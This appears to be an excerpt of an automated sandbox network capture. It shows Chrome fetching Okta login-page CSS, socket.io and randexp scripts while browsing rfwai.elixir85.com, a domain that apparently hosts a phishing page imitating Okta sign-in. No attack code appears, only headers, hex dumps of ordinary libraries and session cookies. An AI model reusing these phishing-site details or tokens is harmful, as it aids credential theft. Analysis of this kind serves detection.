                                                        2024-07-03 19:07:21 UTC16384INData Raw: 6f 6e 73 65 6e 74 2d 64 65 73 63 72 69 70 74 69 6f 6e 20 70 7b 63 6f 6c 6f 72 3a 23 36 65 36 65 37 38 7d 23 6f 6b 74 61 2d 73 69 67 6e 2d 69 6e 20 2e 63 6f 6e 73 65 6e 74 2d 72 65 71 75 69 72 65 64 20 2e 63 6f 6e 73 65 6e 74 2d 66 6f 6f 74 65 72 2c 23 6f 6b 74 61 2d 73 69 67 6e 2d 69 6e 20 2e 67 72 61 6e 75 6c 61 72 2d 63 6f 6e 73 65 6e 74 20 2e 63 6f 6e 73 65 6e 74 2d 66 6f 6f 74 65 72 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 23 6f 6b 74 61 2d 73 69 67 6e 2d 69 6e 20 2e 63 6f 6e 73 65 6e 74 2d 72 65 71 75 69 72 65 64 20 2e 63 6f 6e 73 65 6e 74 2d 66 6f 6f 74 65 72 20 61 2c 23 6f 6b 74 61 2d 73 69 67 6e 2d 69 6e 20 2e 67 72 61 6e 75 6c 61 72 2d 63 6f 6e 73 65 6e 74 20 2e 63 6f 6e 73 65 6e 74 2d 66 6f 6f 74 65 72 20 61 7b 63 6f 6c 6f 72 3a
                                                        Data Ascii: onsent-description p{color:#6e6e78}#okta-sign-in .consent-required .consent-footer,#okta-sign-in .granular-consent .consent-footer{text-align:center}#okta-sign-in .consent-required .consent-footer a,#okta-sign-in .granular-consent .consent-footer a{color:


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        59192.168.2.54978518.245.31.334433748C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-07-03 19:07:20 UTC625OUTGET /4.6.0/socket.io.min.js HTTP/1.1
                                                        Host: cdn.socket.io
                                                        Connection: keep-alive
                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                        sec-ch-ua-mobile: ?0
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                        sec-ch-ua-platform: "Windows"
                                                        Accept: */*
                                                        Sec-Fetch-Site: cross-site
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: script
                                                        Referer: https://rfwai.elixir85.com/
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        2024-07-03 19:07:21 UTC703INHTTP/1.1 200 OK
                                                        Content-Type: application/javascript; charset=utf-8
                                                        Content-Length: 45806
                                                        Connection: close
                                                        Accept-Ranges: bytes
                                                        Access-Control-Allow-Origin: *
                                                        Cache-Control: public, max-age=31536000, immutable
                                                        Content-Disposition: inline; filename="socket.io.min.js"
                                                        Date: Fri, 05 Jan 2024 09:12:45 GMT
                                                        ETag: "80f5b8c6a9eeac15de93e5a112036a06"
                                                        Server: Vercel
                                                        Strict-Transport-Security: max-age=63072000
                                                        X-Vercel-Cache: HIT
                                                        X-Vercel-Id: fra1::kcxpj-1704445965394-d209ffeb73cf
                                                        X-Cache: Hit from cloudfront
                                                        Via: 1.1 fbd2b51fce9ee4f3aa7b93dbbda3d698.cloudfront.net (CloudFront)
                                                        X-Amz-Cf-Pop: FRA56-P8
                                                        X-Amz-Cf-Id: nE3iaXYueMeiDRaSNn8HYO6D2Ida1uC9aHirIFgeRiDtK8HYFvNtDA==
                                                        Age: 15705740
                                                        2024-07-03 19:07:21 UTC16384INData Raw: 2f 2a 21 0a 20 2a 20 53 6f 63 6b 65 74 2e 49 4f 20 76 34 2e 36 2e 30 0a 20 2a 20 28 63 29 20 32 30 31 34 2d 32 30 32 33 20 47 75 69 6c 6c 65 72 6d 6f 20 52 61 75 63 68 0a 20 2a 20 52 65 6c 65 61 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 4c 69 63 65 6e 73 65 2e 0a 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 65 29 3a 28 74 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67
                                                        Data Ascii: /*! * Socket.IO v4.6.0 * (c) 2014-2023 Guillermo Rauch * Released under the MIT License. */!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?module.exports=e():"function"==typeof define&&define.amd?define(e):(t="undefined"!=typeof g
                                                        2024-07-03 19:07:21 UTC16384INData Raw: 6c 65 3d 21 31 3b 66 6f 72 28 76 61 72 20 6e 3d 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 76 61 72 20 72 3d 74 5b 6e 5d 2c 69 3d 6e 3d 3d 3d 74 2e 6c 65 6e 67 74 68 2d 31 3b 45 28 72 2c 65 2e 73 75 70 70 6f 72 74 73 42 69 6e 61 72 79 2c 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 74 72 79 7b 65 2e 77 73 2e 73 65 6e 64 28 74 29 7d 63 61 74 63 68 28 74 29 7b 7d 69 26 26 69 74 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 65 2e 77 72 69 74 61 62 6c 65 3d 21 30 2c 65 2e 65 6d 69 74 52 65 73 65 72 76 65 64 28 22 64 72 61 69 6e 22 29 7d 29 2c 65 2e 73 65 74 54 69 6d 65 6f 75 74 46 6e 29 7d 29 29 7d 2c 72 3d 30 3b 72 3c 74 2e 6c 65 6e 67 74 68 3b 72 2b 2b 29 6e 28 72 29 7d 7d 2c 7b 6b 65 79 3a 22 64 6f 43 6c 6f 73 65 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 6f
                                                        Data Ascii: le=!1;for(var n=function(n){var r=t[n],i=n===t.length-1;E(r,e.supportsBinary,(function(t){try{e.ws.send(t)}catch(t){}i&&it((function(){e.writable=!0,e.emitReserved("drain")}),e.setTimeoutFn)}))},r=0;r<t.length;r++)n(r)}},{key:"doClose",value:function(){vo
                                                        2024-07-03 19:07:21 UTC13038INData Raw: 73 68 69 66 74 28 74 29 2c 74 68 69 73 2e 5f 6f 70 74 73 2e 72 65 74 72 69 65 73 26 26 21 74 68 69 73 2e 66 6c 61 67 73 2e 66 72 6f 6d 51 75 65 75 65 26 26 21 74 68 69 73 2e 66 6c 61 67 73 2e 76 6f 6c 61 74 69 6c 65 29 72 65 74 75 72 6e 20 74 68 69 73 2e 5f 61 64 64 54 6f 51 75 65 75 65 28 6e 29 2c 74 68 69 73 3b 76 61 72 20 69 3d 7b 74 79 70 65 3a 45 74 2e 45 56 45 4e 54 2c 64 61 74 61 3a 6e 2c 6f 70 74 69 6f 6e 73 3a 7b 7d 7d 3b 69 66 28 69 2e 6f 70 74 69 6f 6e 73 2e 63 6f 6d 70 72 65 73 73 3d 21 31 21 3d 3d 74 68 69 73 2e 66 6c 61 67 73 2e 63 6f 6d 70 72 65 73 73 2c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 6e 5b 6e 2e 6c 65 6e 67 74 68 2d 31 5d 29 7b 76 61 72 20 6f 3d 74 68 69 73 2e 69 64 73 2b 2b 2c 73 3d 6e 2e 70 6f 70 28 29 3b 74 68
                                                        Data Ascii: shift(t),this._opts.retries&&!this.flags.fromQueue&&!this.flags.volatile)return this._addToQueue(n),this;var i={type:Et.EVENT,data:n,options:{}};if(i.options.compress=!1!==this.flags.compress,"function"==typeof n[n.length-1]){var o=this.ids++,s=n.pop();th


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        60192.168.2.549790108.156.39.604433748C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-07-03 19:07:20 UTC610OUTGET /assets/loginpage/css/loginpage-theme.e0d37a504604ef874bad26435d62011f.css HTTP/1.1
                                                        Host: ok4static.oktacdn.com
                                                        Connection: keep-alive
                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                        sec-ch-ua-mobile: ?0
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        sec-ch-ua-platform: "Windows"
                                                        Accept: text/css,*/*;q=0.1
                                                        Sec-Fetch-Site: cross-site
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: style
                                                        Referer: https://rfwai.elixir85.com/
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        2024-07-03 19:07:21 UTC769INHTTP/1.1 200 OK
                                                        Content-Type: text/css
                                                        Content-Length: 10498
                                                        Connection: close
                                                        Date: Fri, 21 Jun 2024 06:21:31 GMT
                                                        Server: nginx
                                                        Last-Modified: Thu, 14 Mar 2024 00:03:58 GMT
                                                        ETag: "e0d37a504604ef874bad26435d62011f"
                                                        x-amz-meta-sha1sum: 4301f0d2b729ae22adece657d79eccaa25f429b1
                                                        Expires: Sat, 21 Jun 2025 06:21:31 GMT
                                                        Cache-Control: max-age=31536000
                                                        Cache-Control: public,max-age=31536000,s-maxage=1814400
                                                        Strict-Transport-Security: max-age=315360000; includeSubDomains
                                                        Access-Control-Allow-Origin: *
                                                        Accept-Ranges: bytes
                                                        Vary: Accept-Encoding
                                                        X-Cache: Hit from cloudfront
                                                        Via: 1.1 728b6476f3e2317ec8044d22806d4f94.cloudfront.net (CloudFront)
                                                        X-Amz-Cf-Pop: LHR50-P1
                                                        X-Amz-Cf-Id: p0P32G2BAIDZPLptAnYHJQ7wFbMXUGdK3nHYL-RbiRkDnUgzZLuTXA==
                                                        Age: 1082749
                                                        2024-07-03 19:07:21 UTC10498INData Raw: 61 2c 61 62 62 72 2c 61 63 72 6f 6e 79 6d 2c 61 64 64 72 65 73 73 2c 61 70 70 6c 65 74 2c 62 2c 62 69 67 2c 62 6c 6f 63 6b 71 75 6f 74 65 2c 62 6f 64 79 2c 63 61 70 74 69 6f 6e 2c 63 65 6e 74 65 72 2c 63 69 74 65 2c 63 6f 64 65 2c 64 64 2c 64 65 6c 2c 64 66 6e 2c 64 69 76 2c 64 6c 2c 64 74 2c 65 6d 2c 66 69 65 6c 64 73 65 74 2c 66 6f 72 6d 2c 68 31 2c 68 32 2c 68 33 2c 68 34 2c 68 35 2c 68 36 2c 68 74 6d 6c 2c 69 2c 69 66 72 61 6d 65 2c 69 6d 67 2c 69 6e 73 2c 6b 62 64 2c 6c 61 62 65 6c 2c 6c 65 67 65 6e 64 2c 6c 69 2c 6f 62 6a 65 63 74 2c 6f 6c 2c 70 2c 70 72 65 2c 71 2c 73 2c 73 61 6d 70 2c 73 6d 61 6c 6c 2c 73 70 61 6e 2c 73 74 72 69 6b 65 2c 73 74 72 6f 6e 67 2c 73 75 62 2c 73 75 70 2c 74 61 62 6c 65 2c 74 62 6f 64 79 2c 74 64 2c 74 66 6f 6f 74 2c 74
                                                        Data Ascii: a,abbr,acronym,address,applet,b,big,blockquote,body,caption,center,cite,code,dd,del,dfn,div,dl,dt,em,fieldset,form,h1,h2,h3,h4,h5,h6,html,i,iframe,img,ins,kbd,label,legend,li,object,ol,p,pre,q,s,samp,small,span,strike,strong,sub,sup,table,tbody,td,tfoot,t


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        61192.168.2.549791185.199.109.1334433748C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-07-03 19:07:21 UTC1126OUTGET /github-production-release-asset-2e65be/2925284/11f3acf8-4ccb-11e6-8ce4-c179c0a212de?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20240703%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240703T190720Z&X-Amz-Expires=300&X-Amz-Signature=2954020ef3ae9b37bcd25c50a692a541af80978c55971e321c89a2f9def9fd71&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=2925284&response-content-disposition=attachment%3B%20filename%3Drandexp.min.js&response-content-type=application%2Foctet-stream HTTP/1.1
                                                        Host: objects.githubusercontent.com
                                                        Connection: keep-alive
                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                        sec-ch-ua-mobile: ?0
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                        sec-ch-ua-platform: "Windows"
                                                        Accept: */*
                                                        Sec-Fetch-Site: cross-site
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: script
                                                        Referer: https://rfwai.elixir85.com/
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        2024-07-03 19:07:21 UTC812INHTTP/1.1 200 OK
                                                        Connection: close
                                                        Content-Length: 10245
                                                        Content-Type: application/octet-stream
                                                        Content-MD5: bCCivoupALwKcRiJOisQcg==
                                                        Last-Modified: Tue, 07 Dec 2021 16:38:45 GMT
                                                        ETag: "0x8D9B9A009499A1E"
                                                        Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
                                                        x-ms-request-id: 04b78ebf-b01e-005d-5b87-b2ebd1000000
                                                        x-ms-version: 2020-10-02
                                                        x-ms-creation-time: Tue, 17 Aug 2021 14:57:31 GMT
                                                        x-ms-lease-status: unlocked
                                                        x-ms-lease-state: available
                                                        x-ms-blob-type: BlockBlob
                                                        Content-Disposition: attachment; filename=randexp.min.js
                                                        x-ms-server-encrypted: true
                                                        Via: 1.1 varnish, 1.1 varnish
                                                        Accept-Ranges: bytes
                                                        Date: Wed, 03 Jul 2024 19:07:21 GMT
                                                        Age: 3351
                                                        X-Served-By: cache-iad-kjyo7100092-IAD, cache-ewr18155-EWR
                                                        X-Cache: HIT, HIT
                                                        X-Cache-Hits: 5262, 5
                                                        X-Timer: S1720033642.622777,VS0,VE37
                                                        2024-07-03 19:07:21 UTC1378INData Raw: 2f 2f 0a 2f 2f 20 72 61 6e 64 65 78 70 20 76 30 2e 34 2e 33 0a 2f 2f 20 43 72 65 61 74 65 20 72 61 6e 64 6f 6d 20 73 74 72 69 6e 67 73 20 74 68 61 74 20 6d 61 74 63 68 20 61 20 67 69 76 65 6e 20 72 65 67 75 6c 61 72 20 65 78 70 72 65 73 73 69 6f 6e 2e 0a 2f 2f 0a 2f 2f 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 32 30 31 36 20 62 79 20 52 6f 6c 79 20 46 65 6e 74 61 6e 65 73 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 66 65 6e 74 29 0a 2f 2f 20 4d 49 54 20 4c 69 63 65 6e 73 65 0a 2f 2f 20 68 74 74 70 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 66 65 6e 74 2f 72 61 6e 64 65 78 70 2e 6a 73 2f 72 61 77 2f 6d 61 73 74 65 72 2f 4c 49 43 45 4e 53 45 20 0a 2f 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 22 52 61 6e 64 45 78 70 22
                                                        Data Ascii: //// randexp v0.4.3// Create random strings that match a given regular expression.//// Copyright (C) 2016 by Roly Fentanes (https://github.com/fent)// MIT License// http://github.com/fent/randexp.js/raw/master/LICENSE //!function(){var e="RandExp"
                                                        2024-07-03 19:07:21 UTC1378INData Raw: 29 2c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 74 2e 72 61 6e 64 49 6e 74 26 26 28 65 2e 72 61 6e 64 49 6e 74 3d 74 2e 72 61 6e 64 49 6e 74 29 7d 66 75 6e 63 74 69 6f 6e 20 75 28 65 2c 74 29 7b 76 61 72 20 6e 2c 69 2c 70 2c 68 2c 63 3b 73 77 69 74 63 68 28 65 2e 74 79 70 65 29 7b 63 61 73 65 20 6c 2e 52 4f 4f 54 3a 63 61 73 65 20 6c 2e 47 52 4f 55 50 3a 69 66 28 65 2e 66 6f 6c 6c 6f 77 65 64 42 79 7c 7c 65 2e 6e 6f 74 46 6f 6c 6c 6f 77 65 64 42 79 29 72 65 74 75 72 6e 22 22 3b 66 6f 72 28 65 2e 72 65 6d 65 6d 62 65 72 26 26 76 6f 69 64 20 30 3d 3d 3d 65 2e 67 72 6f 75 70 4e 75 6d 62 65 72 26 26 28 65 2e 67 72 6f 75 70 4e 75 6d 62 65 72 3d 74 2e 70 75 73 68 28 6e 75 6c 6c 29 2d 31 29 2c 6e 3d 65 2e 6f 70 74 69 6f 6e 73 3f 61 2e 63 61 6c 6c
                                                        Data Ascii: ),"function"==typeof t.randInt&&(e.randInt=t.randInt)}function u(e,t){var n,i,p,h,c;switch(e.type){case l.ROOT:case l.GROUP:if(e.followedBy||e.notFollowedBy)return"";for(e.remember&&void 0===e.groupNumber&&(e.groupNumber=t.push(null)-1),n=e.options?a.call
                                                        2024-07-03 19:07:21 UTC1378INData Raw: 65 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 63 2e 72 61 6e 64 65 78 70 28 74 68 69 73 29 7d 7d 2c 63 2e 70 72 6f 74 6f 74 79 70 65 2e 64 65 66 61 75 6c 74 52 61 6e 67 65 3d 6e 65 77 20 68 28 33 32 2c 31 32 36 29 2c 63 2e 70 72 6f 74 6f 74 79 70 65 2e 72 61 6e 64 49 6e 74 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 65 2b 4d 61 74 68 2e 66 6c 6f 6f 72 28 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 2a 28 31 2b 74 2d 65 29 29 7d 7d 2c 7b 22 64 69 73 63 6f 6e 74 69 6e 75 6f 75 73 2d 72 61 6e 67 65 22 3a 32 2c 72 65 74 3a 33 7d 5d 2c 32 3a 5b 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 66 75 6e 63 74 69 6f 6e 20 72 28 65 2c 74 29 7b 74 68 69 73 2e 6c 6f 77 3d 65 2c 74 68 69 73 2e 68 69 67 68 3d 74 2c 74 68 69 73 2e 6c 65
                                                        Data Ascii: en=function(){return c.randexp(this)}},c.prototype.defaultRange=new h(32,126),c.prototype.randInt=function(e,t){return e+Math.floor(Math.random()*(1+t-e))}},{"discontinuous-range":2,ret:3}],2:[function(e,t,n){function r(e,t){this.low=e,this.high=t,this.le
                                                        2024-07-03 19:07:21 UTC1378INData Raw: 2e 6c 65 6e 67 74 68 3b 29 74 2e 70 75 73 68 28 73 2e 72 61 6e 67 65 73 5b 6e 5d 2e 63 6c 6f 6e 65 28 29 29 2c 6e 2b 2b 3b 73 2e 72 61 6e 67 65 73 3d 74 2c 61 28 73 29 7d 76 61 72 20 73 3d 74 68 69 73 3b 72 65 74 75 72 6e 20 65 20 69 6e 73 74 61 6e 63 65 6f 66 20 6f 3f 65 2e 72 61 6e 67 65 73 2e 66 6f 72 45 61 63 68 28 6e 29 3a 65 20 69 6e 73 74 61 6e 63 65 6f 66 20 72 3f 6e 28 65 29 3a 28 76 6f 69 64 20 30 3d 3d 3d 74 26 26 28 74 3d 65 29 2c 6e 28 6e 65 77 20 72 28 65 2c 74 29 29 29 2c 74 68 69 73 7d 2c 6f 2e 70 72 6f 74 6f 74 79 70 65 2e 73 75 62 74 72 61 63 74 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 66 75 6e 63 74 69 6f 6e 20 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 3d 5b 5d 2c 6e 3d 30 3b 6e 3c 73 2e 72 61 6e 67 65 73 2e 6c 65 6e 67 74 68 26 26
                                                        Data Ascii: .length;)t.push(s.ranges[n].clone()),n++;s.ranges=t,a(s)}var s=this;return e instanceof o?e.ranges.forEach(n):e instanceof r?n(e):(void 0===t&&(t=e),n(new r(e,t))),this},o.prototype.subtract=function(e,t){function n(e){for(var t=[],n=0;n<s.ranges.length&&
                                                        2024-07-03 19:07:21 UTC1378INData Raw: 29 3b 62 72 65 61 6b 3b 63 61 73 65 22 44 22 3a 68 2e 70 75 73 68 28 61 2e 6e 6f 74 49 6e 74 73 28 29 29 3b 62 72 65 61 6b 3b 63 61 73 65 22 73 22 3a 68 2e 70 75 73 68 28 61 2e 77 68 69 74 65 73 70 61 63 65 28 29 29 3b 62 72 65 61 6b 3b 63 61 73 65 22 53 22 3a 68 2e 70 75 73 68 28 61 2e 6e 6f 74 57 68 69 74 65 73 70 61 63 65 28 29 29 3b 62 72 65 61 6b 3b 64 65 66 61 75 6c 74 3a 2f 5c 64 2f 2e 74 65 73 74 28 6e 29 3f 68 2e 70 75 73 68 28 7b 74 79 70 65 3a 6f 2e 52 45 46 45 52 45 4e 43 45 2c 76 61 6c 75 65 3a 70 61 72 73 65 49 6e 74 28 6e 2c 31 30 29 7d 29 3a 68 2e 70 75 73 68 28 7b 74 79 70 65 3a 6f 2e 43 48 41 52 2c 76 61 6c 75 65 3a 6e 2e 63 68 61 72 43 6f 64 65 41 74 28 30 29 7d 29 7d 62 72 65 61 6b 3b 63 61 73 65 22 5e 22 3a 68 2e 70 75 73 68 28 73 2e
                                                        Data Ascii: );break;case"D":h.push(a.notInts());break;case"s":h.push(a.whitespace());break;case"S":h.push(a.notWhitespace());break;default:/\d/.test(n)?h.push({type:o.REFERENCE,value:parseInt(n,10)}):h.push({type:o.CHAR,value:n.charCodeAt(0)})}break;case"^":h.push(s.
                                                        2024-07-03 19:07:21 UTC1378INData Raw: 68 26 26 63 28 69 29 2c 68 2e 70 75 73 68 28 7b 74 79 70 65 3a 6f 2e 52 45 50 45 54 49 54 49 4f 4e 2c 6d 69 6e 3a 30 2c 6d 61 78 3a 31 2f 30 2c 76 61 6c 75 65 3a 68 2e 70 6f 70 28 29 7d 29 3b 62 72 65 61 6b 3b 64 65 66 61 75 6c 74 3a 68 2e 70 75 73 68 28 7b 74 79 70 65 3a 6f 2e 43 48 41 52 2c 76 61 6c 75 65 3a 6e 2e 63 68 61 72 43 6f 64 65 41 74 28 30 29 7d 29 7d 72 65 74 75 72 6e 20 30 21 3d 3d 6c 2e 6c 65 6e 67 74 68 26 26 72 2e 65 72 72 6f 72 28 65 2c 22 55 6e 74 65 72 6d 69 6e 61 74 65 64 20 67 72 6f 75 70 22 29 2c 75 7d 2c 74 2e 65 78 70 6f 72 74 73 2e 74 79 70 65 73 3d 6f 7d 2c 7b 22 2e 2f 70 6f 73 69 74 69 6f 6e 73 22 3a 34 2c 22 2e 2f 73 65 74 73 22 3a 35 2c 22 2e 2f 74 79 70 65 73 22 3a 36 2c 22 2e 2f 75 74 69 6c 22 3a 37 7d 5d 2c 34 3a 5b 66 75
                                                        Data Ascii: h&&c(i),h.push({type:o.REPETITION,min:0,max:1/0,value:h.pop()});break;default:h.push({type:o.CHAR,value:n.charCodeAt(0)})}return 0!==l.length&&r.error(e,"Unterminated group"),u},t.exports.types=o},{"./positions":4,"./sets":5,"./types":6,"./util":7}],4:[fu
                                                        2024-07-03 19:07:21 UTC1378INData Raw: 72 2e 43 48 41 52 2c 76 61 6c 75 65 3a 36 35 32 37 39 7d 5d 7d 2c 69 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 5b 7b 74 79 70 65 3a 72 2e 43 48 41 52 2c 76 61 6c 75 65 3a 31 30 7d 2c 7b 74 79 70 65 3a 72 2e 43 48 41 52 2c 76 61 6c 75 65 3a 31 33 7d 2c 7b 74 79 70 65 3a 72 2e 43 48 41 52 2c 76 61 6c 75 65 3a 38 32 33 32 7d 2c 7b 74 79 70 65 3a 72 2e 43 48 41 52 2c 76 61 6c 75 65 3a 38 32 33 33 7d 5d 7d 3b 6e 2e 77 6f 72 64 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 7b 74 79 70 65 3a 72 2e 53 45 54 2c 73 65 74 3a 61 28 29 2c 6e 6f 74 3a 21 31 7d 7d 2c 6e 2e 6e 6f 74 57 6f 72 64 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 7b 74 79 70 65 3a 72 2e 53 45 54 2c 73 65 74 3a 61 28 29 2c 6e 6f 74 3a 21 30 7d 7d 2c 6e 2e 69 6e
                                                        Data Ascii: r.CHAR,value:65279}]},i=function(){return[{type:r.CHAR,value:10},{type:r.CHAR,value:13},{type:r.CHAR,value:8232},{type:r.CHAR,value:8233}]};n.words=function(){return{type:r.SET,set:a(),not:!1}},n.notWords=function(){return{type:r.SET,set:a(),not:!0}},n.in
                                                        2024-07-03 19:07:21 UTC599INData Raw: 68 69 74 65 73 70 61 63 65 28 29 29 3b 65 6c 73 65 20 69 66 28 61 5b 34 5d 29 69 2e 70 75 73 68 28 6f 2e 6e 6f 74 57 6f 72 64 73 28 29 29 3b 65 6c 73 65 20 69 66 28 61 5b 35 5d 29 69 2e 70 75 73 68 28 6f 2e 6e 6f 74 49 6e 74 73 28 29 29 3b 65 6c 73 65 20 69 66 28 61 5b 36 5d 29 69 2e 70 75 73 68 28 6f 2e 6e 6f 74 57 68 69 74 65 73 70 61 63 65 28 29 29 3b 65 6c 73 65 20 69 66 28 61 5b 37 5d 29 69 2e 70 75 73 68 28 7b 74 79 70 65 3a 72 2e 52 41 4e 47 45 2c 66 72 6f 6d 3a 28 61 5b 38 5d 7c 7c 61 5b 39 5d 29 2e 63 68 61 72 43 6f 64 65 41 74 28 30 29 2c 74 6f 3a 61 5b 31 30 5d 2e 63 68 61 72 43 6f 64 65 41 74 28 30 29 7d 29 3b 65 6c 73 65 7b 69 66 28 21 28 73 3d 61 5b 31 32 5d 29 29 72 65 74 75 72 6e 5b 69 2c 75 2e 6c 61 73 74 49 6e 64 65 78 5d 3b 69 2e 70 75
                                                        Data Ascii: hitespace());else if(a[4])i.push(o.notWords());else if(a[5])i.push(o.notInts());else if(a[6])i.push(o.notWhitespace());else if(a[7])i.push({type:r.RANGE,from:(a[8]||a[9]).charCodeAt(0),to:a[10].charCodeAt(0)});else{if(!(s=a[12]))return[i,u.lastIndex];i.pu


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        62192.168.2.549792104.21.89.1434433748C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-07-03 19:07:21 UTC1397OUTGET /89U0IUXkEak2DXQHKMqxZiF121VeznpNcbYfab72 HTTP/1.1
                                                        Host: rfwai.elixir85.com
                                                        Connection: keep-alive
                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                        Origin: https://rfwai.elixir85.com
                                                        sec-ch-ua-mobile: ?0
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        sec-ch-ua-platform: "Windows"
                                                        Accept: */*
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: font
                                                        Referer: https://rfwai.elixir85.com/188360859051247984209ISEMAEXOUROIUPGWHX?9377770014860499179375zgciqmroynnkxewjkliw
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: XSRF-TOKEN=eyJpdiI6IlVubklVOFVmbTFQZEcrME9vWmlYVkE9PSIsInZhbHVlIjoiTW8zZVZpWWdQV3JtOFhRM1RqZytMRUFRWWtqNWF0UEZMTDFmUVlXTjhnMWlUc2lGMXdxZFZPMnhXT1BkR29meWNzK1R2eXdtWm52UmNFKzJscU9nR2labU91ZU5JQUZuYXBEejgwK2pCb2NyY0dVSlVEb25UMHN1MlBBd0p2dTQiLCJtYWMiOiJhMTcyZTQ3ZWNiYmFmNzIyMGJmNDRjYTk4OWEyZjQzMmViYTVkMTZhZmNkNGE4ZWE0OWM2Y2QzMDZjMmMxN2EyIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Im04ck5QR08xUmVCSEVyOEdVNnI2U3c9PSIsInZhbHVlIjoiaGZBQW54NnRUNXdjcUhjM1BTdStSbU0yVURBa0NEaUN2dytucWE1SFhNRGswaUhCRG92bEpRSzV0Q3cwNzZyRmhveFN1d055SG1KNUo0K0JDdjNBNVZzUHhDMnBEQVBsTms1NVhjaVdBZGlRYVczc2hOSHpUTkloUnBwaS8zYkUiLCJtYWMiOiI0MGY2MTZmZmQ5OTZjNzdlMDIwODg4NDhlMzhjM2IzYmUzOTU3NDg5Y2I4YjgxZWJkNzJkY2M3ZDFiY2M3NzM1IiwidGFnIjoiIn0%3D
                                                        2024-07-03 19:07:22 UTC645INHTTP/1.1 200 OK
                                                        Date: Wed, 03 Jul 2024 19:07:22 GMT
                                                        Content-Type: font/woff2
                                                        Content-Length: 43596
                                                        Connection: close
